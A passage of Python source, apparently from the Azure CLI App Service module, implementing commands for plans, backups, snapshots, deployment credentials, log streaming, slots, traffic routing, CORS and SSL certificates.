name=name, per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def) return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name, resource_group_name=resource_group_name, app_service_plan=plan_def) def update_app_service_plan(instance, sku=None, number_of_workers=None): if number_of_workers is None and sku is None: logger.warning('No update is done. Specify --sku and/or --number-of-workers.') sku_def = instance.sku if sku is not None: sku = _normalize_sku(sku) sku_def.tier = get_sku_name(sku) sku_def.name = sku if number_of_workers is not None: sku_def.capacity = number_of_workers instance.sku = sku_def return instance def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None): instance = update_app_service_plan(instance, sku, number_of_workers) if max_burst is not None: if not is_plan_elastic_premium(cmd, instance): raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans") max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20) instance.maximum_elastic_worker_count = max_burst if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances', number_of_workers, min_val=0, max_val=20) return update_app_service_plan(instance, sku, number_of_workers) def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except Exception: # pylint: disable=broad-except raise CLIError('Backup configuration not found') def list_backups(cmd, resource_group_name, webapp_name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot) def create_backup(cmd, resource_group_name, webapp_name, storage_account_url, db_name=None, db_type=None, db_connection_string=None, backup_name=None, slot=None): 
BackupRequest = cmd.get_models('BackupRequest') client = web_client_factory(cmd.cli_ctx) if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_request = BackupRequest(backup_request_name=backup_name, storage_account_url=storage_account_url, databases=db_setting) if slot: return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot) return client.web_apps.backup(resource_group_name, webapp_name, backup_request) def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None, frequency=None, keep_at_least_one_backup=None, retention_period_in_days=None, db_name=None, db_connection_string=None, db_type=None, backup_name=None, slot=None): DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models( 'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest') configuration = None if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] if not backup_name: backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M')) try: configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except DefaultErrorResponseException: # No configuration set yet if not all([storage_account_url, frequency, retention_period_in_days, keep_at_least_one_backup]): raise CLIError('No backup configuration found. A configuration must be created. 
' + 'Usage: --container-url URL --frequency TIME --retention DAYS ' + '--retain-one TRUE/FALSE') # If arguments were not specified, use the values in the current backup schedule if storage_account_url is None: storage_account_url = configuration.storage_account_url if retention_period_in_days is None: retention_period_in_days = configuration.backup_schedule.retention_period_in_days if keep_at_least_one_backup is None: keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup else: keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true' if frequency: # Parse schedule frequency frequency_num, frequency_unit = _parse_frequency(cmd, frequency) else: frequency_num = configuration.backup_schedule.frequency_interval frequency_unit = configuration.backup_schedule.frequency_unit if configuration and configuration.databases: db = configuration.databases[0] db_type = db_type or db.database_type db_name = db_name or db.name db_connection_string = db_connection_string or db.connection_string db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name, keep_at_least_one_backup=keep_at_least_one_backup, retention_period_in_days=retention_period_in_days) backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule, enabled=True, storage_account_url=storage_account_url, databases=db_setting) return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration', slot, backup_request) def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name, db_name=None, db_type=None, db_connection_string=None, target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None): RestoreRequest = cmd.get_models('RestoreRequest') client = web_client_factory(cmd.cli_ctx) storage_blob_name = backup_name if 
not storage_blob_name.lower().endswith('.zip'): storage_blob_name += '.zip' db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) restore_request = RestoreRequest(storage_account_url=storage_account_url, blob_name=storage_blob_name, overwrite=overwrite, site_name=target_name, databases=db_setting, ignore_conflicting_host_names=ignore_hostname_conflict) if slot: return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot) return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request) def list_snapshots(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots', slot) def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name source_resource_group=None, source_name=None, source_slot=None): from azure.cli.core.commands.client_factory import get_subscription_id SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest') client = web_client_factory(cmd.cli_ctx) recover_config = not restore_content_only if all([source_resource_group, source_name]): # Restore from source app to target app sub_id = get_subscription_id(cmd.cli_ctx) source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \ "/providers/Microsoft.Web/sites/" + source_name if source_slot: source_id = source_id + "/slots/" + source_slot source = SnapshotRecoverySource(id=source_id) request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) if any([source_resource_group, source_name]): raise CLIError('usage error: 
--source-resource-group and --source-name must both be specified if one is used') # Overwrite app with its own snapshot request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) # pylint: disable=inconsistent-return-statements def _create_db_setting(cmd, db_name, db_type, db_connection_string): DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting') if all([db_name, db_type, db_connection_string]): return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)] if any([db_name, db_type, db_connection_string]): raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING') def _parse_frequency(cmd, frequency): FrequencyUnit = cmd.get_models('FrequencyUnit') unit_part = frequency.lower()[-1] if unit_part == 'd': frequency_unit = FrequencyUnit.day elif unit_part == 'h': frequency_unit = FrequencyUnit.hour else: raise CLIError('Frequency must end with d or h for "day" or "hour"') try: frequency_num = int(frequency[:-1]) except ValueError: raise CLIError('Frequency must start with a number') if frequency_num < 0: raise CLIError('Frequency must be positive') return frequency_num, frequency_unit def _get_location_from_resource_group(cli_ctx, resource_group_name): client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES) group = client.resource_groups.get(resource_group_name) return group.location def _get_location_from_webapp(client, resource_group_name, webapp): webapp = client.web_apps.get(resource_group_name, webapp) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp)) return webapp.location def _get_deleted_apps_locations(cli_ctx): client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES) web_provider = 
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    # Build the authenticated local-git deployment URL for an app:
    # "<scheme>://<publishing user>@<scm host>/<app>.git"
    user = client.get_publishing_user()
    result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control',
                                     slot)
    parsed = urlparse(result.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name, parsed.netloc,
                                      name)


def _get_scm_url(cmd, resource_group_name, name, slot=None):
    # Return the Kudu/SCM endpoint URL for an app by scanning its SSL host
    # entries for the repository host type.
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    for host in webapp.host_name_ssl_states or []:
        if host.host_type == HostType.repository:
            return "https://{}".format(host.name)

    # this should not happen, but throw anyway
    raise ValueError('Failed to retrieve Scm Uri')


def get_publishing_user(cmd):
    # Show the subscription-wide deployment (publishing) user.
    client = web_client_factory(cmd.cli_ctx)
    return client.get_publishing_user()


def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    user = User(publishing_user_name=user_name)
    if password is None:
        # Interactive prompt; fails fast when there is no TTY.
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user.publishing_password = password
    return client.update_publishing_user(user)


def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    # Return the app's publishing credentials (resolves the SDK poller).
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_credentials', slot)
    return content.result()


def list_publish_profiles(cmd, resource_group_name, name, slot=None):
    # Fetch the publish-profile XML (with secrets) and convert it into a list
    # of plain dicts, one per profile.
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    full_xml = ''
    for f in content:
        full_xml += f.decode()

    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    converted = []
    for profile in profiles:
        new = {}
        for key in profile:
            # strip the leading '@' xmltodict put in for attributes
            new[key.lstrip('@')] = profile[key]
        converted.append(new)
    return converted


def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    # Toggle Docker continuous deployment via the DOCKER_ENABLE_CI app setting,
    # then report the resulting CI/CD webhook URL.
    settings = []
    settings.append("DOCKER_ENABLE_CI=" + enable)

    update_app_settings(cmd, resource_group_name, name, settings, slot)

    return show_container_cd_url(cmd, resource_group_name, name, slot)


def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    # Report whether Docker CI is enabled and, when it is, the Kudu docker
    # webhook URL built from the publishing credentials.
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = False
    for setting in settings:
        if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
            docker_enabled = True
            break

    cd_settings = {}
    cd_settings['DOCKER_ENABLE_CI'] = docker_enabled

    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        if credentials:
            cd_url = credentials.scm_uri + '/docker/hook'
            cd_settings['CI_CD_URL'] = cd_url
    else:
        cd_settings['CI_CD_URL'] = ''

    return cd_settings


def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    # Open the app's URL in the default browser; optionally start log streaming.
    url = _get_url(cmd, resource_group_name, name, slot)
    open_page_in_browser(url)
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)


def _get_url(cmd, resource_group_name, name, slot=None):
    # Compute the browsable URL of an app, preferring https when any hostname
    # has SSL enabled.
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
    ssl_host = next((h for h in site.host_name_ssl_states
                     if h.ssl_state != SslState.disabled), None)
    return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    # Configure the app's diagnostic logs. Each logging category is only
    # touched when its corresponding argument was supplied (non-None).
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig,
                                       FileSystemHttpLogsConfig, EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location

    application_logs = None
    if application_logging is not None:
        if not application_logging:
            level = 'Off'
        elif level is None:
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level=level)
        application_logs = ApplicationLogsConfig(file_system=fs_log)

    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100,
                                                             retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)

    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'update_diagnostic_logs_config', slot, site_log_config)


def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    # Show the current diagnostic-logs configuration.
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_diagnostic_logs_configuration', slot)


def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    # Enable or disable auto-swap on a deployment slot; empty string clears it.
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config,
                                                     slot)


def list_slots(cmd, resource_group_name, webapp):
    # List deployment slots, trimming names to the bare slot name and exposing
    # the plan name instead of the full server_farm_id.
    client = web_client_factory(cmd.cli_ctx)
    slots = list(client.web_apps.list_slots(resource_group_name, webapp))
    for slot in slots:
        slot.name = slot.name.split('/')[-1]
        setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
        del slot.server_farm_id
    return slots


def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
    # Perform a slot action: 'swap' (full swap), 'preview' (apply config only),
    # or anything else to reset a previously previewed swap.
    client = web_client_factory(cmd.cli_ctx)
    if action == 'swap':
        poller = client.web_apps.swap_slot_slot(resource_group_name, webapp, slot,
                                                (target_slot or 'production'), True)
        return poller
    if action == 'preview':
        if target_slot is None:
            result = client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                     webapp, slot, True)
        else:
            result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                                   slot, target_slot, True)
        return result
    # we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    # Delete a deployment slot.
    client = web_client_factory(cmd.cli_ctx)
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    client.web_apps.delete_slot(resource_group_name, webapp, slot)


def set_traffic_routing(cmd, resource_group_name, name, distribution):
    # Configure percentage-based traffic routing between slots. `distribution`
    # entries are "<slot>=<percentage>" strings; rules are rebuilt from scratch.
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # Split "<app>.<domain suffix>" once so slot host names can be derived as
    # "<app>-<slot>.<domain suffix>".
    host_name_split = site.default_host_name.split('.', 1)
    host_name_suffix = '.' + host_name_split[1]
    host_name_val = host_name_split[0]
    configs.experiments.ramp_up_rules = []
    for r in distribution:
        slot, percentage = r.split('=')
        action_host_name_slot = host_name_val + "-" + slot
        configs.experiments.ramp_up_rules.append(
            RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
                       reroute_percentage=float(percentage),
                       name=slot))
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None,
                            configs)

    return configs.experiments.ramp_up_rules


def show_traffic_routing(cmd, resource_group_name, name):
    # Show the current slot traffic-routing rules.
    configs = get_site_configs(cmd, resource_group_name, name)
    return configs.experiments.ramp_up_rules


def clear_traffic_routing(cmd, resource_group_name, name):
    # Remove all traffic-routing rules (all traffic goes to production).
    set_traffic_routing(cmd, resource_group_name, name, [])


def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    # Append origins to the app's CORS allow-list.
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'update_configuration', slot, configs)
    return result.cors


def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    # Remove the given origins from the CORS allow-list; with no origins given,
    # clear the list entirely.
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or [])
                                            if x not in allowed_origins]
        else:
            configs.cors.allowed_origins = []
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                          'update_configuration', slot, configs)
    return configs.cors


def show_cors(cmd, resource_group_name, name, slot=None):
    # Show the app's CORS settings.
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    return configs.cors


def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    # Stream live logs from the Kudu /logstream endpoint on a daemon thread;
    # the main thread sleeps so Ctrl+C can interrupt the command.
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))

    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    t.daemon = True
    t.start()

    while True:
        time.sleep(100)  # so that ctrl+c can stop the command
scm_url + '/logstream' if provider: streaming_url += ('/' + provider.lstrip('/')) user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) t = threading.Thread(target=_get_log, args=(streaming_url, user, password)) t.daemon = True t.start() while True: time.sleep(100) # so that ctrl+c can stop the command def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) url = scm_url.rstrip('/') + '/dump' user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) _get_log(url, user_name, password, log_file) logger.warning('Downloaded logs to %s', log_file) def _get_site_credential(cli_ctx, resource_group_name, name, slot=None): creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot) creds = creds.result() return (creds.publishing_user_name, creds.publishing_password) def _get_log(url, user_name, password, log_file=None): import certifi import urllib3 try: import urllib3.contrib.pyopenssl urllib3.contrib.pyopenssl.inject_into_urllib3() except ImportError: pass http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where()) headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) r = http.request( 'GET', url, headers=headers, preload_content=False ) if r.status != 200: raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format( url, r.status, r.reason)) if log_file: # download logs with open(log_file, 'wb') as f: while True: data = r.read(1024) if not data: break f.write(data) else: # streaming std_encoding = sys.stdout.encoding for chunk in r.stream(): if chunk: # Extra encode() and decode for stdout which does not surpport 'utf-8' print(chunk.decode(encoding='utf-8', errors='replace') .encode(std_encoding, errors='replace') .decode(std_encoding, errors='replace'), end='') # each line of log has CRLF. 
r.release_conn() def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None): Certificate = cmd.get_models('Certificate') client = web_client_factory(cmd.cli_ctx) webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) cert_file = open(certificate_file, 'rb') cert_contents = cert_file.read() hosting_environment_profile_param = (webapp.hosting_environment_profile.name if webapp.hosting_environment_profile else '') thumb_print = _get_cert(certificate_password, certificate_file) cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param, webapp.location, resource_group_name) cert = Certificate(password=certificate_password, pfx_blob=cert_contents, location=webapp.location, server_farm_id=webapp.server_farm_id) return client.certificates.create_or_update(resource_group_name, cert_name, cert) def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name): return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name) def _get_cert(certificate_password, certificate_file): ''' Decrypts the .pfx file ''' p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password) cert = p12.get_certificate() digest_algorithm = 'sha1' thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '') return thumbprint def list_ssl_certs(cmd, resource_group_name): client = web_client_factory(cmd.cli_ctx) return client.certificates.list_by_resource_group(resource_group_name) def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint): client = web_client_factory(cmd.cli_ctx) webapp_certs = client.certificates.list_by_resource_group(resource_group_name) for webapp_cert in webapp_certs: if webapp_cert.thumbprint == certificate_thumbprint: return client.certificates.delete(resource_group_name, webapp_cert.name) raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint)) 
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    # Import a certificate stored in Key Vault into the app's resource group.
    # Warns (without failing) when the WebSites service principal's Key Vault
    # permissions cannot be verified.
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name,
                                                                            resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name):
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)

    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=key_vault_certificate_name,
                              server_farm_id=server_farm_id)

    return client.certificates.create_or_update(name=cert_name,
                                                resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)


def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    # Create a free App Service managed certificate for a custom hostname.
    # Not available on Free/Shared plans, and the hostname must already be
    # bound to the app.
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name,
                                                                               resource_group_name))

    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'],
                                             parsed_plan_id['name'])
    if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')

    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name,
                                                          slot_text))

    server_farm_id = webapp.server_farm_id
    location = webapp.location
    easy_cert_def = Certificate(location=location, canonical_name=hostname,
                                server_farm_id=server_farm_id, password='')
    return client.certificates.create_or_update(name=hostname,
                                                resource_group_name=resource_group_name,
                                                certificate_envelope=easy_cert_def)


def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name):
    # Best-effort check that the Microsoft.Azure.WebSites service principal
    # (public or government cloud app id) has the Secret:Get access policy on
    # the vault. Returns False when no matching policy is found.
    from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
    vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # Check for Microsoft.Azure.WebSites app registration
    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
                for perm in policy.permissions.secrets:
                    if perm == "Get":
                        return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp, host_name,
                                ssl_state, thumbprint, slot=None):
    # Update the SSL binding state of a single hostname by PUTting a minimal
    # Site payload with to_update=True on the targeted hostname.
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
                                                                 ssl_state=ssl_state,
                                                                 thumbprint=thumbprint,
                                                                 to_update=True)],
                          location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                   'create_or_update', slot, updated_webapp)


def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    # Find the certificate with the given thumbprint in the plan's resource
    # group and bind (or unbind) it to every matching hostname on the app.
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))

    # Certificates live in the resource group of the app service plan.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            # Fast path: a single, non-wildcard hostname on the cert.
            if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
                return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                                   webapp_cert.host_names[0], ssl_type,
                                                   certificate_thumbprint, slot)

            # Otherwise match cert hostnames (incl. wildcards) against the
            # app's registered hostnames and update each match.
            query_result = list_hostnames(cmd, resource_group_name, name, slot)
            hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
            to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
            for h in to_update:
                _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, h, ssl_type,
                                            certificate_thumbprint, slot)

            return show_webapp(cmd, resource_group_name, name, slot)

    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))


def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    # Bind a certificate using SNI or IP-based SSL.
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
                               SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)


def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    # Disable the SSL binding for the certificate's hostnames.
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, SslState.disabled, slot)


def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    # the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
    matched = set()
    for hostname in hostnames_from_cert:
        if hostname.startswith('*'):
            for h in hostnames_in_webapp:
                # Compare the domain part only (everything from the first dot).
                if hostname[hostname.find('.'):] == h[h.find('.'):]:
                    matched.add(h)
        elif hostname in hostnames_in_webapp:
            matched.add(hostname)
    return matched


# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):

    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux
        self._stacks = []  # lazily populated by _load_stacks()

    def resolve(self, display_name):
        # Case-insensitive lookup of a stack by its display name, e.g. 'node|10.14'.
        self._load_stacks()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)

    @property
    def stacks(self):
        self._load_stacks()
        return self._stacks

    @staticmethod
